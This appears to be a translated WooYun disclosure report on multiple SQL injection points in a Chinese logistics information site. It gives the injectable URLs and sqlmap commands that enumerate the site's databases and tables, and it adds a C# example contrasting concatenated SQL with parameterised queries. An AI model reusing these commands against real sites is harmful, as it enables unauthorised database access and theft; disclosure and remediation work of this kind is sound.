
Vulnerability summary (followers: 24)

Defect ID: wooyun-2014-083366

Title: Multiple injection points in 全国物流信息网 (National Logistics Information Network), bundled together (involving a large amount of database information)

Vendor: 全国物流信息网 (National Logistics Information Network)

Author: answer

Submitted: 2014-11-17 14:02

Fix time: 2015-01-01 14:04

Disclosed: 2015-01-01 14:04

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-11-17: Details sent to the vendor, awaiting the vendor's handling
2014-11-21: Vendor confirmed; details disclosed to the vendor only
2014-12-01: Details disclosed to core white hats and relevant domain experts
2014-12-11: Details disclosed to regular white hats
2014-12-21: Details disclosed to intern white hats
2015-01-01: Details disclosed to the public

Brief description:

http://www.wooyun.org/bugs/wooyun-2014-083231 made it to the front page (not sure whether it is the same company); this bundle is submitted only to make the front page. Front page, please....

Detailed description:

After reading this vulnerability, WooYun: SQL injection in 全国物流信息网 (involving a large amount of database information), I took a look myself and came away with quite a bit.
Injection point 1: www.56888.net/Video/VideoDetails.aspx?id=1 (duplicate)


sqlmap.py -u "http://www.56888.net/Video/VideoDetails.aspx?id=1" -D "web_56888_net" --tables
It dumped a large amount of database information.
Too much to copy in full.
I did not dig any deeper, to avoid a knock on the door.
Injection point 2:
http://www.56888.net/search/goodslist/?keywords=zz time-based blind injection, a bit slow


Injection point 3: this is a subdomain, but it is indeed the same database, so it falls as well:
http://wb.56888.net/TenderListProject.aspx?&tendertype=2&g=cg&s=fh&c=fg" -p "c" -D "web_56888_net" --tables


Same database: I will not list the tables, they are identical to the ones above.


Injection point 4:
http://wb.56888.net/TenderList.aspx?&tendertype=0&g=s&s=s" -p "s" --dbs


Proof of vulnerability:

After reading this vulnerability, WooYun: SQL injection in 全国物流信息网 (involving a large amount of database information), I went to practise on it too and found that this site was compromised.

Fix:

Filtering.
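As an added example, not code from the report or from the vendor, this shows the concatenation pattern behind injection points 1 and 2 next to the parameterised ADO.NET form that the "filtering" fix should take on an ASP.NET/SQL Server stack like this one; the class, method, column names and the LIKE-based goods search are assumptions, and the table names are illustrative.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Hypothetical data-access class for the two request shapes in the report
// (VideoDetails.aspx?id=... and /search/goodslist/?keywords=...); names assumed.
public static class SafeQueries
{
    // VULNERABLE pattern: request input is concatenated into the SQL text,
    // so the value can change the statement itself. Shown only for contrast.
    public static string UnsafeVideoSql(string id) =>
        "SELECT Title, Url FROM video WHERE id = " + id;

    // Numeric parameter: validate the type, then bind it as a typed parameter.
    public static DataTable LoadVideo(SqlConnection conn, string rawId)
    {
        if (!int.TryParse(rawId, out int id) || id <= 0)
            throw new ArgumentException("id must be a positive integer");

        using (var cmd = new SqlCommand(
            "SELECT Title, Url FROM video WHERE id = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            return Fill(cmd);
        }
    }

    // String parameter used in a LIKE: binding alone stops injection; the
    // wildcard escaping only keeps a user from matching every row.
    public static DataTable SearchGoods(SqlConnection conn, string keywords)
    {
        string pattern = "%" + keywords.Replace("[", "[[]")
                                       .Replace("%", "[%]")
                                       .Replace("_", "[_]") + "%";
        using (var cmd = new SqlCommand(
            "SELECT TOP (50) GoodsName FROM Shopping WHERE GoodsName LIKE @kw", conn))
        {
            cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 200).Value = pattern;
            return Fill(cmd);
        }
    }

    private static DataTable Fill(SqlCommand cmd)
    {
        var table = new DataTable();
        using (var reader = cmd.ExecuteReader())
            table.Load(reader);
        return table;
    }
}
```

Because the value travels as a bound parameter rather than as SQL text, the time-based blind technique used against the keywords parameter has nothing to inject into, whatever the string contains.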

Copyright notice: please credit the source when reposting: answer@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 13

Confirmed: 2014-11-21 14:23

Vendor reply:

Latest status:

None yet